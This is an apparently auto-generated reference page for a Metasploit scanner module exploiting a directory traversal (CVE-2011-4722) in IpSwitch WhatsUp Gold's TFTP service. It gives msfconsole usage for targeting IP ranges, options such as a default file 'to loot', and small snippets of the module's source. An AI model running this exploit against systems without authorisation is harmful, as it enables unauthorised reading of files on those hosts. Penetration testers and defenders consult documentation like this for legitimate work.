IpSwitch WhatsUp Gold TFTP Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: IpSwitch WhatsUp Gold TFTP Directory Traversal
Module: auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
Source code: modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
Disclosure date: 2011-12-12
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 69
List of CVEs: CVE-2011-4722

This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp Gold's TFTP service.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
msf auxiliary(ipswitch_whatsupgold_tftp) > show options
    ... show and set options ...
msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS ip-range
msf auxiliary(ipswitch_whatsupgold_tftp) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(ipswitch_whatsupgold_tftp) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/tftp/ipswitch_whatsupgold_tftp auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp

msf6 auxiliary(scanner/tftp/ipswitch_whatsupgold_tftp) > show info

       Name: IpSwitch WhatsUp Gold TFTP Directory Traversal
     Module: auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2011-12-12

Provided by:
  Prabhu S Angadi
  sinn3r <[email protected]>
  juan vazquez <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  windows\win.ini  no        The file to loot
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     69               yes       The target port
  SAVE      false            no        Save the downloaded file to disk
  THREADS   1                yes       The number of concurrent threads (max one per host)

Description:
  This modules exploits a directory traversal vulnerability in 
  IpSwitch WhatsUp Gold's TFTP service.

References:
  OSVDB (77455)
  http://www.securityfocus.com/bid/50890
  https://www.exploit-db.com/exploits/18189
  http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
  https://nvd.nist.gov/vuln/detail/CVE-2011-4722

Module Options


This is a complete list of options available in the scanner/tftp/ipswitch_whatsupgold_tftp auxiliary module:

msf6 auxiliary(scanner/tftp/ipswitch_whatsupgold_tftp) > show options

Module options (auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  windows\win.ini  no        The file to loot
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     69               yes       The target port
   SAVE      false            no        Save the downloaded file to disk
   THREADS   1                yes       The number of concurrent threads (max one per host)

Advanced Options


Here is a complete list of advanced options supported by the scanner/tftp/ipswitch_whatsupgold_tftp auxiliary module:

msf6 auxiliary(scanner/tftp/ipswitch_whatsupgold_tftp) > show advanced

Module advanced options (auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/tftp/ipswitch_whatsupgold_tftp module can do:

msf6 auxiliary(scanner/tftp/ipswitch_whatsupgold_tftp) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/tftp/ipswitch_whatsupgold_tftp auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/tftp/ipswitch_whatsupgold_tftp) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error retrieving file <FILE_NAME> from <IP>


Here is a relevant code snippet related to the "Error retrieving file <FILE_NAME> from <IP>" error message:

67:	
68:	    while (r = udp_sock.recvfrom(65535, 0.1) and r[1])
69:	
70:	      opcode, block, data = r[0].unpack("nna*") # Parse reply
71:	      if opcode != 3 # Check opcode: 3 => Data Packet
72:	        print_error("Error retrieving file #{file_name} from #{ip}")
73:	        return
74:	      end
75:	      file_data << data
76:	      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack
77:	

Error retrieving file <FILE_NAME> from <IP>


Here is a relevant code snippet related to the "Error retrieving file <FILE_NAME> from <IP>" error message:

76:	      udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack
77:	
78:	    end
79:	
80:	    if file_data.empty?
81:	        print_error("Error retrieving file #{file_name} from #{ip}")
82:	        return
83:	    end
84:	
85:	    udp_sock.close
86:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Prabhu S Angadi
  • sinn3r
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.